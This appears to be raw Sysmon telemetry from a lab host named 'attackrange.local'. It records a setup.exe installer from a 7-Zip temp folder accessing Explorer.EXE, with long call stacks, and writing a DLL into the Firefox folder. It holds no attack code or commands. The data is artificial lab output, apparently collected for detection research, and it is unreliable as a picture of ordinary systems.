:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\libEGL.dll2021-01-18 13:59:52.364 10341000x800000000000000014913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
